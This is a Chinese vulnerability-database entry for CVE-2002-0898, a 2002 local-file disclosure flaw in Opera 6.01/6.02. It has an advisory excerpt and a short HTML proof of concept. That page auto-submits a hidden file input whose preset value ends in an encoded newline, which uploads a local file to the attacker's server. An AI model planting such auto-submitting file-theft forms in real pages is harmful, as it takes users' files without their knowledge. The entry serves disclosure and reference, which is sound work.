Opera本地文件泄露漏洞-安全小百科

Opera本地文件泄露漏洞

漏洞ID	1106751	漏洞类型	未知
发布时间	2002-05-27	更新时间	2005-05-16
CVE编号	CVE-2002-0898	CNNVD-ID	CNNVD-200210-081
漏洞平台	Windows	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/21483
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200210-081

|漏洞详情

Opera是一款流行的Web浏览器，可使用在多种Unix和Linux操作系统下，也可运行在MicrosoftWindows操作系统下。Opera在处理’file’HTML输入类型时存在漏洞，可导致远程攻击者获得Opera客户端系统中的任意文件。Opera浏览器支持类型，这是一个用于用户上载文件到HTTP服务器的标准模式，由于牵涉到安全问题，多数浏览器不允许设置”value”类型，如果此”value”设置为任意值，就可能导致攻击者服务器获得客户端系统的本地文件。而Opera支持设置”value”属性，不过在把文件发送到服务器时，会出现如下内容的对话框：Thefileslistedbelowhavebeenselected，withoutyourintervention，tobesenttoanothercomputer.Doyouwanttosendthesefiles?”此安全机制存在漏洞，可导致攻击服务器绕过Opera的文件上载确认对话框，而下载Opera用户系统中任意文件。攻击者可以通过在文件元素”value”属性中的文件名后追加””(HTML编码代表ASCII码中的换行符)而使Opera不出现文件上载确认提示框直接上载文件到服务器上，导致敏感信息泄露。

|漏洞EXP

source: http://www.securityfocus.com/bid/4834/info

A vulnerability has been reported in Opera 6.01/6.02. The vulnerability is related to handling of the 'file' HTML input-type. It is possible for a server to set the file value, while fooling Opera into thinking no file has been specified. This is possible if the filename is appended with the string "
". This HTML-encoded newline character will cause the browser to believe that no value has been set. Consequently, the form will be submitted and the specified file will be uploaded to the server. This may occur without knowledge or consent of the victim user.

Exploitation of this vulnerability allows for malicious webmasters to obtain arbitrary files from client systems. 

<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php"
name="secForm">
<input type="file" name="expFile" value="c:test.txt
"
style="visibility:hidden">
</form>
</body>

|参考资料

来源:BID
名称:4834
链接:http://www.securityfocus.com/bid/4834
来源:XF
名称:opera-browser-file-retrieval(9188)
链接:http://www.iss.net/security_center/static/9188.php
来源:www.opera.com
链接:http://www.opera.com/windows/changelog/log603.html
来源:BUGTRAQ
名称:20020527ReadingANYlocalfileinOpera(GM#001-OP)
链接:http://online.securityfocus.com/archive/1/274202
来源:NTBUGTRAQ
名称:20020527ReadingANYlocalfileinOpera(GM#001-OP)
链接:http://marc.theaimsgroup.com/?l=ntbugtraq&m;=102256058220402&w;=2

相关推荐: IceWarp Web Mail Multiple Unspecified Remote Input Validation Vulnerabilities

IceWarp Web Mail Multiple Unspecified Remote Input Validation Vulnerabilities 漏洞ID 1097880 漏洞类型 Input Validation Error 发布时间 2004-1…

文章版权归作者所有，未经允许请勿转载。

THE END